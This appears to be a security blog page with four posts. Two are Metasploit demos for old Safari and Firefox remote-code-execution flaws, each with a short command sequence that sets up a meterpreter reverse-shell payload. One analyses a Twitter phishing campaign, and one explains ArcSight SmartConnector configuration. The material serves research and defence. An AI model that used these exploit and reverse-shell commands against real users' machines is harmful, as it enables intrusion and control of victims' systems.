CVE-2011-3230 Apple Safari file:// Arbitrary Code Execution Metasploit Demo

Timeline :

Vulnerability discovered and reported to vendor by Aaron Sigel
Coordinated release of the vulnerability the 2011-10-12
Metasploit PoC provided the 2011-10-16

PoC provided by :

Aaron Sigel
sinn3r

Reference(s) :

CVE-2011-3230
HT5000

Affected version(s) :

Safari 5.1 for Mac OS X v10.6.8
Safari 5.1 for Mac OS X Server v10.6.8
Safari 5.1 for OS X Lion v10.7.2
Safari 5.1 for OS X Lion Server v10.7.2

Tested on Mac OS X 10.7.1 with :

Safari 5.1 (7524.48.3) and Java SE Runtime Environment (build 1.6.0_26-b03-383-11A511)

Description :

This module exploits a vulnerability found in Apple Safari on OSX platform. A policy issue in the handling of file:// URLs may allow arbitrary remote code execution under the context of the user. In order to trigger arbitrary remote code execution, the best way seems to be opening a share on the victim machine first (this can be SMB/WebDav/FTP, or a fileformat that OSX might automount), and then execute it in /Volumes/[share]. If there’s some kind of bug that leaks the victim machine’s current username, then it’s also possible to execute the payload in /Users/[username]/Downloads/, or else bruteforce your way to getting that information. Please note that non-java payloads (*.sh extension) might get launched by Xcode instead of executing it, in that case please try the Java ones instead.

Commands :

use exploit/osx/browser/safari_file_policy
set SRVHOST 192.168.178.21
set URIPATH /readme.html
set TARGET 1
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

getuid
sysinfo

Twitter Phishing “Bad blog going around about you, heard or seen it yet?”

I received an unusual private message “Bad blog going around about you, heard or seen it yet?” from one of my followers. Unfortunately my follower fell into a traditional Twitter phishing and his account is surely now compromised.

As you can see in the screenshot the link point to “http://airtar.ru“, a domain name registered since the 2011-10-13 by “[email protected]“. The web site is hosted on 111.123.180.39 in AS4134 ChinaNet GuiZhou Province and the hosting web server redirect you directly on “http://www.twittelr.com/r/“.

HTTP/1.1 301 Moved Permanently
Server: nginx/1.0.6
Date: Sun, 16 Oct 2011 18:48:24 GMT
Content-Type: text/html
Content-Length: 184
Connection: keep-alive
Location: http://www.twittelr.com/r/
P3P: CP="CAO COR CURa ADMa DEVa OUR IND ONL COM DEM PRE"

twittelr.com” domain name is registered since the 2011-09-23 by “yu zhang [email protected]“. The web site is hosted on 220.164.140.252 in AS4134 China Telecom Yunnan Province. Some funny host name are hosted on the same name server than “twittelr.com“, like “xn--fiqs8s13n4ywnyd.net“.

Accessing “http://www.twittelr.com/r/” will redirect you to “http://www.twittelr.com/timed_out_session-/“.

You will see this phishing page how is quiet good in term of design.

If you provide your login and password the form will post all your informations on “http://www.twittelr.com/app/login2.php” and then redirect you to “http://www.twittelr.com/status/error/” page, but it is to late.

If you access directly on the root directory of “twittelr.com” you will observe an chinese under-construction page :)

ArcSight SmartConnector Configuration User Guide – Part 1

With the free ArcSight Logger L750MB, you have download some associated SmartConnectors, Snare SmartConnector, Cisco IOS SmartConnector, Unix Auditd SmartConnector, etc. The configuration of each SmartConnector is customizable in order to activate batching, time correction, caching, QoS (Quality of Service), aggregation or filtering.

In this blog post we will show some examples on how to configure your SmartConnector.

SmartConnector Configuration setup

Under Windows, you will need to run the “runagentsetup.bat” script and under Linux the “runagentsetup.sh” script. The scripts are located into your “$ARCSIGHT_HOME/current/bin” directory.

Changing SmartConnector parameters

By selecting “0 – I want to change SmartConnector parameters“, you will be able to change, for example on a Syslog Daemon SmartConnector, the network port, listener IP address and associated protocol. You will also able to switch between a standalone application installation or as a service installation.

Changing SmartConnector service settings

By selecting “1 – I want to change SmartConnector service settings“, you will be able, same as for the first option, to switch between a standalone application installation or as a service installation.

Adding/Removing/Modifying SmartConnector Destinations

By selecting “2 – I want to add/remove/modify ArcSight Manager destinations“, you will be able to modify your initial destination configuration, in our case a L750MB Logger, or to add a new destination, for example another Logger or ESM (Enterprise Security Manager)

This configuration option will allow you to add a fail over destination or also to re-register a SmartConnector.

Modifying actual SmartConnector destination parameters

If you select your actual destination you will be able to modify your actual destination parameters “0 – Modify destination parameters” :

  • Host name or IP address of the actual destination
  • Port of the actual destination
  • Receiver Name of the actual destination
  • Enable or not compression mode


Compression mode will allow the SmartConnector to send events to the destination in a compressed format and lowers the network bandwidth usage.

Adding a fail over destination to your actual SmartConnector

If you need to have a fail over destination for your actual SmartConnector configuration you will have the choice between an ESM or Logger destination. The setup of the fail over destination is the same as creating a first destination, you will have to provide the following information’s :

  • Host name or IP address of the fail over destination (Manager or Logger)
  • Port of the actual destination (Manager or Logger). 9000 for software Logger, 443 for appliance Logger and 8443 for ESM.
  • Receiver Name of the actual destination (Logger)
  • Enable or not compression mode (Logger)

Some specific configurations are necessary for an ESM destination like “AUP Master Destination“, “Filter Out All Events“, ESM user name and password, but we will not describe these configurations settings.

Configure multiple parallel destinations

ArcSight SmartConnector is also able to send a copy of events to each additional configured destinations. You could for example send you events in parallel to two Logger’s, or to one Logger and one ESM, or to two ESM. This could be useful to have a copy of the events or to setup a lab environment in parallel of your production environment. You can configure additional destinations by selecting “1 – Add new destination“.

Modifying batching destination settings

SmartConnectors allow you to batch all processed events, in order to increase performance and bandwidth usage, by three options :

  • Batching per events : The connector will wait that the provided value of events is reached and then send the block of events to your destination. The default configured value is 100 events.
  • Batching per seconds : The connector will wait that the provided value in seconds is reached and then send the block of events to your destination. The default configured value is 5 seconds.
  • Batch by time based or severity based : The “Time Based” selection will allow the SmartConnector to send batches as they arrive, how is the default configuration. The “Severity Based” selection will allow the SmartConnector to send batches based upon the events severity (highest first then lowest).

If you have high volume of events, you should prefer the “Severity Based” selection in order to have a focus on high severity events first.

Modifying time correction settings

ArcSight SmartConnector will allow you to do time corrections. For example, if you have a remote SmartConnector how has a valid NTP synchronization :

  • The end device could have time troubles, cause no NTP configured or bad NTP configuration.
  • The end device could be in a different timezone than the remote SmartConnector.

If the device is in the past, you should normally receive this kind of event:

deviceEventClassID : agent:012
name : Device Receipt Time from [centos5-6-1.zataz.loc|192.168.178.76|Unix|auditd] may be incorrect - Device Receipt Time is smaller than Agent Receipt Time (Events are in the past)
deviceEventCategory : /Agent/Time/Device?Failure
deviceReceiptTime : The device time how is in the past.
agentReceiptTime : The time of the SmartConnector.

If the device is in the future, you should normally receive this kind of event:

deviceEventClassID : agent:012
name : Device Receipt Time from [centos5-6-1.zataz.loc|192.168.178.76|Unix|auditd] may be incorrect - Device Receipt Time is greater than Agent Receipt Time (Events are in the future)
deviceEventCategory : /Agent/Time/Device?Failure
deviceReceiptTime : The device time how is in the futur.
agentReceiptTime : The time of the SmartConnector.

By setting “Use Connector Time as Device Time” to yes, the SmartConnector will override the reported device time by using the SmartConnector time.

Also you will able to provide a “Device Time Correction” in seconds for all devices how are sending they’re events to this SmartConnector. You will also be able to provide a “SmartConnector Time Correction” in seconds, if the server where the SmartConnector is installed don’t has a synchronized NTP.

Another example of time correction is if the device doesn’t have a valid configured timezone or if the device events don’t report the timezone, you can through this option specify the desired timezone on the SmartConnector.

In “$ARCSIGHT_HOME/logs/agent.log” file, you can see that these settings are activated by :

But take care, time correction is not a setting to configure without knowing what you are doing. If you modify the timestamp of the events, you will :

  • Gain the ability to do events searches, generate reports or valid correlation rules on the ESM or Logger based on the same timestamp.
  • Loose the “real” timestamp of the events, if you don’t preserve raw events. In case of forensics purpose to loose the “real” timestamp could be dramatically.

Modifying time auto-correction settings

With time auto-correction you will be able to specify forward and backwards time limits for your events. If the values are exceeded the SmartConnector will automatically correct the time with the SmartConnector time. By default the “-1” values are disabling the auto-correction, you can specify values in seconds for the forward and backwards time limits, and also filter by devices separated by commas.

In “$ARCSIGHT_HOME/logs/agent.log” file, you can see that these settings are activated by :


Modifying time checking settings

These settings will allow you to specify the time threshold and frequency for device time checking. By the SmartConnector will forward events how are 300 seconds in the future and forward events how are 3600 seconds in the past, compared to the SmartConnector time.

Modifying Cache settings

If the configured events destinations are down, or if the number of EPS are to high to be forwarded by batching, the SmartConnector will begin to cache the events. With the cache settings you will be able to adjust your cache size from 5MB to 50GB (by default 1GB), after how many events the SmartConnector will trigger a notification, by default 10 000 events, and the frequency of these notifications from 1 minute to 60 minutes, by default every 10 minutes.

The cache will work in a FIFO mode (First in, First out) if the cache is full, so you have to adjust you cache depending on the number of EPS of the device. For example a device with 25 EPS, and with an average size of 300 bytes per event, you will have the default 10 000 events threshold limit reached in 400 seconds, and the default 1 GB cache size reached in 143 165 seconds (39 hours). But you have also to take into account the aggregation settings how will reduce drastically the size of events in your cache.

Cache files are stored in “$ARCSIGHT_HOME/current/user/agent/agentdata” folder.

If the SmartConnector is caching you will have this kind of event :

deviceEventClassID : agent:019
name : Agent is currently caching events
message : Agent cache contains [100] events
deviceEventCategory : /Agent/Cache/Caching

If the SmartConnector is emptying his cache :

deviceEventClassID : agent:020
name : Agent cache empty
deviceEventCategory : /Agent/Cache/Empty

In the next blog post we will continue to describe SmartConnector network, field based aggregation, filter aggregation, processing and filters settings.

CVE-2011-2371 Mozilla Firefox Array.reduceRight() Integer Overflow Metasploit Demo

Timeline :

Vulnerability discovered and reported to vendor by Chris Rohlf & Yan Ivnitskiy the 2011-06-13
Public release of the vulnerability the 2011-06-21
Metasploit PoC provided the 2011-10-12

PoC provided by :

Chris Rohlf
Yan Ivnitskiy
Matteo Memelli
dookie2000ca
sinn3r

Reference(s) :

CVE-2011-2371
EDB-ID-17974
MFSA-2011-22

Affected version(s) :

Mozilla Firefox versions before 3.6.18
Mozilla Firefox versions before 4.0.1
Thunderbird versions before 3.1.11
SeaMonkey versions before 2.2

Tested on Windows XP SP3 with :

Mozilla Firefox 3.6.16

Description :

This module exploits a vulnerability found in Mozilla Firefox 3.6. When an array object is configured with a large length value, the reduceRight() method may cause an invalid index being used, allowing abitrary remote code execution. Please note that the exploit requires a longer amount of time (compare to a typical browser exploit) in order to gain control of the machine.

Commands :

use exploit/windows/browser/mozilla_reduceright
set LHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

getuid
sysinfo

Go to Top